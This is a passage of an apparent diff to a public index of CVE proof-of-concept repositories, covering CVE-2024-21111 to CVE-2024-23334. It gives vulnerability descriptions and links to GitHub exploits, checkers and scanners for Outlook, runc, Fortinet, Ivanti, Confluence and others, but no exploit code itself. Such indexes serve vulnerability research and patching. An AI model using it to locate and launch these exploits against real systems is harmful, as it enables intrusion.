[10cks/CVE-2024-21111-del](https://github.com/10cks/CVE-2024-21111-del) +- [x0rsys/CVE-2024-21111](https://github.com/x0rsys/CVE-2024-21111) + +### CVE-2024-21305 (2024-01-09) + +Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability + + +- [tandasat/CVE-2024-21305](https://github.com/tandasat/CVE-2024-21305) + +### CVE-2024-21306 (2024-01-09) + +Microsoft Bluetooth Driver Spoofing Vulnerability + + +- [d4rks1d33/C-PoC-for-CVE-2024-21306](https://github.com/d4rks1d33/C-PoC-for-CVE-2024-21306) +- [PhucHauDeveloper/BadBlue](https://github.com/PhucHauDeveloper/BadBlue) + +### CVE-2024-21320 (2024-01-09) + +Windows Themes Spoofing Vulnerability + + +- [sxyrxyy/CVE-2024-21320-POC](https://github.com/sxyrxyy/CVE-2024-21320-POC) + +### CVE-2024-21338 (2024-02-13) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [hakaioffsec/CVE-2024-21338](https://github.com/hakaioffsec/CVE-2024-21338) +- [UMU618/CVE-2024-21338](https://github.com/UMU618/CVE-2024-21338) +- [varwara/CVE-2024-21338](https://github.com/varwara/CVE-2024-21338) +- [Zombie-Kaiser/CVE-2024-21338-x64-build-](https://github.com/Zombie-Kaiser/CVE-2024-21338-x64-build-) +- [tykawaii98/CVE-2024-21338_PoC](https://github.com/tykawaii98/CVE-2024-21338_PoC) +- [Crowdfense/CVE-2024-21338](https://github.com/Crowdfense/CVE-2024-21338) + +### CVE-2024-21345 (2024-02-13) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [exploits-forsale/CVE-2024-21345](https://github.com/exploits-forsale/CVE-2024-21345) +- [FoxyProxys/CVE-2024-21345](https://github.com/FoxyProxys/CVE-2024-21345) + +### CVE-2024-21378 (2024-02-13) + +Microsoft Outlook Remote Code Execution Vulnerability + + +- [d0rb/CVE-2024-21378](https://github.com/d0rb/CVE-2024-21378) + +### CVE-2024-21388 (2024-01-30) + +Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability + + +- [d0rb/CVE-2024-21388](https://github.com/d0rb/CVE-2024-21388) + +### CVE-2024-21412 (2024-02-13) + +Internet Shortcut Files Security Feature Bypass Vulnerability + + +- [lsr00ter/CVE-2024-21412_Water-Hydra](https://github.com/lsr00ter/CVE-2024-21412_Water-Hydra) + +### CVE-2024-21413 (2024-02-13) + +Microsoft Outlook Remote Code Execution Vulnerability + + +- [duy-31/CVE-2024-21413](https://github.com/duy-31/CVE-2024-21413) +- [xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) +- [r00tb1t/CVE-2024-21413-POC](https://github.com/r00tb1t/CVE-2024-21413-POC) +- [CMNatic/CVE-2024-21413](https://github.com/CMNatic/CVE-2024-21413) +- [MSeymenD/CVE-2024-21413](https://github.com/MSeymenD/CVE-2024-21413) +- [Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) +- [ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) +- [dshabani96/CVE-2024-21413](https://github.com/dshabani96/CVE-2024-21413) +- [X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit](https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit) +- [th3Hellion/CVE-2024-21413](https://github.com/th3Hellion/CVE-2024-21413) +- [ShubhamKanhere307/CVE-2024-21413](https://github.com/ShubhamKanhere307/CVE-2024-21413) +- [olebris/CVE-2024-21413](https://github.com/olebris/CVE-2024-21413) +- [DerZiad/CVE-2024-21413](https://github.com/DerZiad/CVE-2024-21413) +- [Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape](https://github.com/Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape) +- [ThemeHackers/CVE-2024-21413](https://github.com/ThemeHackers/CVE-2024-21413) + +### CVE-2024-21514 (2024-06-22) + +This affects versions of the package opencart/opencart from 0.0.0. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data. + + +- [bigb0x/CVE-2024-21514](https://github.com/bigb0x/CVE-2024-21514) + +### CVE-2024-21520 (2024-06-26) + +Versions of the package djangorestframework before 3.15.2 are vulnerable to Cross-site Scripting (XSS) via the break_long_headers template filter due to improper input sanitization before splitting and joining with <br> tags. + + +- [ch4n3-yoon/CVE-2024-21520-Demo](https://github.com/ch4n3-yoon/CVE-2024-21520-Demo) + +### CVE-2024-21534 (2024-10-11) + +All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node.\r\r**Note:**\r\rThere were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226). + + +- [pabloopez/CVE-2024-21534](https://github.com/pabloopez/CVE-2024-21534) +- [XiaomingX/cve-2024-21534-poc](https://github.com/XiaomingX/cve-2024-21534-poc) +- [verylazytech/cve-2024-21534](https://github.com/verylazytech/cve-2024-21534) + +### CVE-2024-21626 (2024-01-31) + +runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue. + + +- [zpxlz/CVE-2024-21626-POC](https://github.com/zpxlz/CVE-2024-21626-POC) +- [NitroCao/CVE-2024-21626](https://github.com/NitroCao/CVE-2024-21626) +- [Wall1e/CVE-2024-21626-POC](https://github.com/Wall1e/CVE-2024-21626-POC) +- [cdxiaodong/CVE-2024-21626](https://github.com/cdxiaodong/CVE-2024-21626) +- [zhangguanzhang/CVE-2024-21626](https://github.com/zhangguanzhang/CVE-2024-21626) +- [laysakura/CVE-2024-21626-demo](https://github.com/laysakura/CVE-2024-21626-demo) +- [V0WKeep3r/CVE-2024-21626-runcPOC](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC) +- [abian2/CVE-2024-21626](https://github.com/abian2/CVE-2024-21626) +- [Sk3pper/CVE-2024-21626](https://github.com/Sk3pper/CVE-2024-21626) +- [KubernetesBachelor/CVE-2024-21626](https://github.com/KubernetesBachelor/CVE-2024-21626) +- [dorser/cve-2024-21626](https://github.com/dorser/cve-2024-21626) +- [FlojBoj/CVE-2024-21626](https://github.com/FlojBoj/CVE-2024-21626) +- [Sk3pper/CVE-2024-21626-old-docker-versions](https://github.com/Sk3pper/CVE-2024-21626-old-docker-versions) +- [adaammmeeee/little-joke](https://github.com/adaammmeeee/little-joke) + +### CVE-2024-21633 (2024-01-03) + +Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files' output path according to their resource names which can be manipulated by attacker to place files at desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that user has write access, and either user name is known or cwd is under user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue. + + +- [0x33c0unt/CVE-2024-21633](https://github.com/0x33c0unt/CVE-2024-21633) + +### CVE-2024-21644 (2024-01-08) + +pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77. + + +- [ltranquility/CVE-2024-21644-Poc](https://github.com/ltranquility/CVE-2024-21644-Poc) + +### CVE-2024-21683 (2024-05-21) + +This High severity RCE (Remote Code Execution) vulnerability was introduced in version 5.2 of Confluence Data Center and Server.\n\nThis RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. \n\nAtlassian recommends that Confluence Data Center and Server customers upgrade to latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions. See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.html\n\nYou can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives.\n\nThis vulnerability was found internally. + + +- [r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server) +- [W01fh4cker/CVE-2024-21683-RCE](https://github.com/W01fh4cker/CVE-2024-21683-RCE) +- [absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server) +- [phucrio/CVE-2024-21683-RCE](https://github.com/phucrio/CVE-2024-21683-RCE) +- [xh4vm/CVE-2024-21683](https://github.com/xh4vm/CVE-2024-21683) + +### CVE-2024-21689 (2024-08-20) + +This High severity RCE (Remote Code Execution) vulnerability CVE-2024-21689  was introduced in versions 9.1.0, 9.2.0, 9.3.0, 9.4.0, 9.5.0, and 9.6.0 of Bamboo Data Center and Server.\r\n\r\nThis RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.6, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction.\r\n\r\nAtlassian recommends that Bamboo Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:\r\n Bamboo Data Center and Server 9.2: Upgrade to a release greater than or equal to 9.2.17\r\n\r\n Bamboo Data Center and Server 9.6: Upgrade to a release greater than or equal to 9.6.5\r\n\r\nSee the release notes ([https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html]). You can download the latest version of Bamboo Data Center and Server from the download center ([https://www.atlassian.com/software/bamboo/download-archives]).\r\n\r\nThis vulnerability was reported via our Bug Bounty program. + + +- [salvadornakamura/CVE-2024-21689](https://github.com/salvadornakamura/CVE-2024-21689) + +### CVE-2024-21733 (2024-01-19) + +Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.\n\n + + +- [LtmThink/CVE-2024-21733](https://github.com/LtmThink/CVE-2024-21733) + +### CVE-2024-21754 (2024-06-11) + +A use of password hash with insufficient computational effort vulnerability [CWE-916] affecting FortiOS version 7.4.3 and below, 7.2 all versions, 7.0 all versions, 6.4 all versions and FortiProxy version 7.4.2 and below, 7.2 all versions, 7.0 all versions, 2.0 all versions may allow a privileged attacker with super-admin profile and CLI access to decrypting the backup file. + + +- [CyberSecuritist/CVE-2024-21754-Forti-RCE](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE) + +### CVE-2024-21762 (2024-02-09) + +A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests + + +- [BishopFox/cve-2024-21762-check](https://github.com/BishopFox/cve-2024-21762-check) +- [cleverg0d/CVE-2024-21762-Checker](https://github.com/cleverg0d/CVE-2024-21762-Checker) +- [h4x0r-dz/CVE-2024-21762](https://github.com/h4x0r-dz/CVE-2024-21762) +- [r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check](https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check) +- [d0rb/CVE-2024-21762](https://github.com/d0rb/CVE-2024-21762) +- [rdoix/cve-2024-21762-checker](https://github.com/rdoix/cve-2024-21762-checker) +- [XiaomingX/cve-2024-21762-poc](https://github.com/XiaomingX/cve-2024-21762-poc) + +### CVE-2024-21793 (2024-05-08) + +\nAn OData injection vulnerability exists in the BIG-IP Next Central Manager API (URI).  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. + + +- [FeatherStark/CVE-2024-21793](https://github.com/FeatherStark/CVE-2024-21793) + +### CVE-2024-21887 (2024-01-12) + +A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. + + +- [oways/ivanti-CVE-2024-21887](https://github.com/oways/ivanti-CVE-2024-21887) +- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887) +- [Chocapikk/CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21887) +- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887) +- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan) +- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped) +- [tucommenceapousser/CVE-2024-21887](https://github.com/tucommenceapousser/CVE-2024-21887) + +### CVE-2024-21893 (2024-01-31) + +A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. + + +- [h4x0r-dz/CVE-2024-21893.py](https://github.com/h4x0r-dz/CVE-2024-21893.py) +- [Chocapikk/CVE-2024-21893-to-CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887) + +### CVE-2024-21978 (2024-08-05) + +Improper input validation in SEV-SNP could allow a malicious hypervisor to read or overwrite guest memory potentially leading to data leakage or data corruption. + + +- [Freax13/cve-2024-21978-poc](https://github.com/Freax13/cve-2024-21978-poc) + +### CVE-2024-21980 (2024-08-05) + +Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to potentially overwrite a guest's memory or UMC seed resulting in loss of confidentiality and integrity. + + +- [Freax13/cve-2024-21980-poc](https://github.com/Freax13/cve-2024-21980-poc) + +### CVE-2024-22002 (2024-06-18) + +CORSAIR iCUE 5.9.105 with iCUE Murals on Windows allows unprivileged users to insert DLL files in the cuepkg-1.2.6 subdirectory of the installation directory. + + +- [0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002](https://github.com/0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002) + +### CVE-2024-22024 (2024-02-13) + +An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication. + + +- [0dteam/CVE-2024-22024](https://github.com/0dteam/CVE-2024-22024) + +### CVE-2024-22026 (2024-05-22) + +A local privilege escalation vulnerability in EPMM before 12.1.0.0 allows an authenticated local user to bypass shell restriction and execute arbitrary commands on the appliance. + + +- [securekomodo/CVE-2024-22026](https://github.com/securekomodo/CVE-2024-22026) + +### CVE-2024-22120 (2024-05-17) + +Zabbix server can perform command execution for configured scripts. After command is executed, audit entry is added to "Audit Log". Due to "clientip" field is not sanitized, it is possible to injection SQL into "clientip" and exploit time based blind SQL injection. + + +- [W01fh4cker/CVE-2024-22120-RCE](https://github.com/W01fh4cker/CVE-2024-22120-RCE) +- [isPique/CVE-2024-22120-RCE-with-gopher](https://github.com/isPique/CVE-2024-22120-RCE-with-gopher) +- [g4nkd/CVE-2024-22120-RCE-with-gopher](https://github.com/g4nkd/CVE-2024-22120-RCE-with-gopher) + +### CVE-2024-22145 (2024-05-17) + +Improper Privilege Management vulnerability in InstaWP Team InstaWP Connect allows Privilege Escalation.This issue affects InstaWP Connect: from n/a through 0.1.0.8. + + +- [RandomRobbieBF/CVE-2024-22145](https://github.com/RandomRobbieBF/CVE-2024-22145) + +### CVE-2024-22198 (2024-01-11) + +Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings. The `Home > Preference` page exposes a list of system settings such as `Run Mode`, `Jwt Secret`, `Node Secret` and `Terminal Start Command`. While the UI doesn't allow users to modify the `Terminal Start Command` setting, it is possible to do so by sending a request to the API. This issue may lead to authenticated remote code execution, privilege escalation, and information disclosure. This vulnerability has been patched in version 2.0.0.beta.9. + + +- [xiw1ll/CVE-2024-22198_Checker](https://github.com/xiw1ll/CVE-2024-22198_Checker) + +### CVE-2024-22243 (2024-02-23) + +Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html  attack or to a SSRF attack if the URL is used after passing validation checks.\n + + +- [SeanPesce/CVE-2024-22243](https://github.com/SeanPesce/CVE-2024-22243) +- [shellfeel/CVE-2024-22243-CVE-2024-22234](https://github.com/shellfeel/CVE-2024-22243-CVE-2024-22234) + +### CVE-2024-22262 (2024-04-16) + +Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html  attack or to a SSRF attack if the URL is used after passing validation checks.\n\nThis is the same as CVE-2024-22259 https://spring.io/security/cve-2024-22259  and CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input.\n\n + + +- [Performant-Labs/CVE-2024-22262](https://github.com/Performant-Labs/CVE-2024-22262) + +### CVE-2024-22263 (2024-06-19) + +Spring Cloud Data Flow is a microservices-based Streaming and Batch data processing in Cloud Foundry and Kubernetes. The Skipper server has the ability to receive upload package requests. However, due to improper sanitization for upload path, a malicious user who has access to skipper server api can use a crafted upload request to write arbitrary file to any location on file system, may even compromises the server. + + +- [securelayer7/CVE-2024-22263_Scanner](https://github.com/securelayer7/CVE-2024-22263_Scanner) + +### CVE-2024-22274 (2024-05-21) + +The vCenter Server contains an authenticated remote code execution vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to run arbitrary commands on the underlying operating system. + + +- [mbadanoiu/CVE-2024-22274](https://github.com/mbadanoiu/CVE-2024-22274) +- [ninhpn1337/CVE-2024-22274](https://github.com/ninhpn1337/CVE-2024-22274) +- [l0n3m4n/CVE-2024-22274-RCE](https://github.com/l0n3m4n/CVE-2024-22274-RCE) +- [Mustafa1986/CVE-2024-22274-RCE](https://github.com/Mustafa1986/CVE-2024-22274-RCE) + +### CVE-2024-22275 (2024-05-21) + +The vCenter Server contains a partial file read vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to partially read arbitrary files containing sensitive data. + + +- [mbadanoiu/CVE-2024-22275](https://github.com/mbadanoiu/CVE-2024-22275) + +### CVE-2024-22369 (2024-02-20) + +Deserialization of Untrusted Data vulnerability in Apache Camel SQL ComponentThis issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.\n\nUsers are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1\n\n + + +- [oscerd/CVE-2024-22369](https://github.com/oscerd/CVE-2024-22369) + +### CVE-2024-22393 (2024-02-22) + +Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.\n\nPixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content.\nUsers are recommended to upgrade to version [1.2.5], which fixes the issue.\n\n + + +- [omranisecurity/CVE-2024-22393](https://github.com/omranisecurity/CVE-2024-22393) + +### CVE-2024-22411 (2024-01-16) + +Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade. + + +- [tamaloa/avo-CVE-2024-22411](https://github.com/tamaloa/avo-CVE-2024-22411) + +### CVE-2024-22416 (2024-01-17) + +pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade. + + +- [mindstorm38/ensimag-secu3a-cve-2024-22416](https://github.com/mindstorm38/ensimag-secu3a-cve-2024-22416) + +### CVE-2024-22514 (2024-02-06) + +An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file. + + +- [Orange-418/CVE-2024-22514-Remote-Code-Execution](https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution) + +### CVE-2024-22515 (2024-02-06) + +Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component. + + +- [Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution](https://github.com/Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution) +- [Orange-418/CVE-2024-22515-File-Upload-Vulnerability](https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability) + +### CVE-2024-22526 (2024-04-12) + +Buffer Overflow vulnerability in bandisoft bandiview v7.0, allows local attackers to cause a denial of service (DoS) via exr image file. + + +- [200101WhoAmI/CVE-2024-22526](https://github.com/200101WhoAmI/CVE-2024-22526) + +### CVE-2024-22532 (2024-02-28) + +Buffer Overflow vulnerability in XNSoft NConvert 7.163 (for Windows x86) allows attackers to cause a denial of service via crafted xwd file. + + +- [pwndorei/CVE-2024-22532](https://github.com/pwndorei/CVE-2024-22532) + +### CVE-2024-22534 +- [austino2000/CVE-2024-22534](https://github.com/austino2000/CVE-2024-22534) + +### CVE-2024-22640 (2024-04-19) + +TCPDF version <=6.6.5 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color. + + +- [zunak/CVE-2024-22640](https://github.com/zunak/CVE-2024-22640) + +### CVE-2024-22641 (-) + +TCPDF version 6.6.5 and before is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted SVG file. + + +- [zunak/CVE-2024-22641](https://github.com/zunak/CVE-2024-22641) + +### CVE-2024-22752 (2024-03-07) + +Insecure permissions issue in EaseUS MobiMover 6.0.5 Build 21620 allows attackers to gain escalated privileges via use of crafted executable launched from the application installation directory. + + +- [hacker625/CVE-2024-22752](https://github.com/hacker625/CVE-2024-22752) + +### CVE-2024-22774 (-) + +An issue in Panoramic Corporation Digital Imaging Software v.9.1.2.7600 allows a local attacker to escalate privileges via the ccsservice.exe component. + + +- [Gray-0men/CVE-2024-22774](https://github.com/Gray-0men/CVE-2024-22774) + +### CVE-2024-22853 (2024-02-06) + +D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session. + + +- [FaLLenSKiLL1/CVE-2024-22853](https://github.com/FaLLenSKiLL1/CVE-2024-22853) + +### CVE-2024-22867 +- [brandon-t-elliott/CVE-2024-22867](https://github.com/brandon-t-elliott/CVE-2024-22867) + +### CVE-2024-22889 (2024-03-05) + +Due to incorrect access control in Plone version v6.0.9, remote attackers can view and list all files hosted on the website via sending a crafted request. + + +- [shenhav12/CVE-2024-22889-Plone-v6.0.9](https://github.com/shenhav12/CVE-2024-22889-Plone-v6.0.9) + +### CVE-2024-22890 +- [BurakSevben/CVE-2024-22890](https://github.com/BurakSevben/CVE-2024-22890) + +### CVE-2024-22891 (2024-03-01) + +Nteract v.0.28.0 was discovered to contain a remote code execution (RCE) vulnerability via the Markdown link. + + +- [EQSTLab/CVE-2024-22891](https://github.com/EQSTLab/CVE-2024-22891) + +### CVE-2024-22894 (2024-01-30) + +An issue fixed in AIT-Deutschland Alpha Innotec Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later and Novelan Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later, allows remote attackers to execute arbitrary code via the password component in the shadow file. + + +- [Jaarden/CVE-2024-22894](https://github.com/Jaarden/CVE-2024-22894) + +### CVE-2024-22899 (2024-02-02) + +Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function. + + +- [Chocapikk/CVE-2024-22899-to-22903-ExploitChain](https://github.com/Chocapikk/CVE-2024-22899-to-22903-ExploitChain) + +### CVE-2024-22909 +- [BurakSevben/CVE-2024-22909](https://github.com/BurakSevben/CVE-2024-22909) + +### CVE-2024-22922 (2024-01-25) + +An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remtoe attacker to escalate privileges via a crafted script to the login page in the POST/index.php + + +- [keru6k/CVE-2024-22922](https://github.com/keru6k/CVE-2024-22922) + +### CVE-2024-22939 (2024-02-01) + +Cross Site Request Forgery vulnerability in FlyCms v.1.0 allows a remote attacker to execute arbitrary code via the system/article/category_edit component. + + +- [NUDTTAN91/CVE-2024-22939](https://github.com/NUDTTAN91/CVE-2024-22939) + +### CVE-2024-22983 (2024-02-28) + +SQL injection vulnerability in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via the name parameter in the myform.php endpoint. + + +- [keru6k/CVE-2024-22983](https://github.com/keru6k/CVE-2024-22983) + +### CVE-2024-23002 +- [xiaomaoxxx/CVE-2024-23002](https://github.com/xiaomaoxxx/CVE-2024-23002) + +### CVE-2024-23108 (2024-02-05) + +An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests. + + +- [horizon3ai/CVE-2024-23108](https://github.com/horizon3ai/CVE-2024-23108) +- [hitem/CVE-2024-23108](https://github.com/hitem/CVE-2024-23108) + +### CVE-2024-23113 (2024-02-15) + +A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized code or commands via specially crafted packets. + + +- [OxLmahdi/cve-2024-23113](https://github.com/OxLmahdi/cve-2024-23113) +- [CheckCve2/CVE-2024-23113](https://github.com/CheckCve2/CVE-2024-23113) +- [p33d/CVE-2024-23113](https://github.com/p33d/CVE-2024-23113) +- [puckiestyle/CVE-2024-23113](https://github.com/puckiestyle/CVE-2024-23113) +- [expl0itsecurity/CVE-2024-23113](https://github.com/expl0itsecurity/CVE-2024-23113) +- [XiaomingX/cve-2024-23113-exp](https://github.com/XiaomingX/cve-2024-23113-exp) +- [XiaomingX/CVE-2024-23113-poc](https://github.com/XiaomingX/CVE-2024-23113-poc) + +### CVE-2024-23208 (2024-01-23) + +The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges. + + +- [hrtowii/CVE-2024-23208-test](https://github.com/hrtowii/CVE-2024-23208-test) + +### CVE-2024-23334 (2024-01-29) + +aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue. + + +- [ox1111/CVE-2024-23334](https://github.com/ox1111/CVE-2024-23334) +- [sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream](https://github.com/sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream) +- [z3rObyte/CVE-2024-23334-PoC](https://github.com/z3rObyte/CVE-2024-23334-PoC) +- [jhonnybonny/CVE-2024-23334](https://github.com/jhonnybonny/CVE-2024-23334) +- 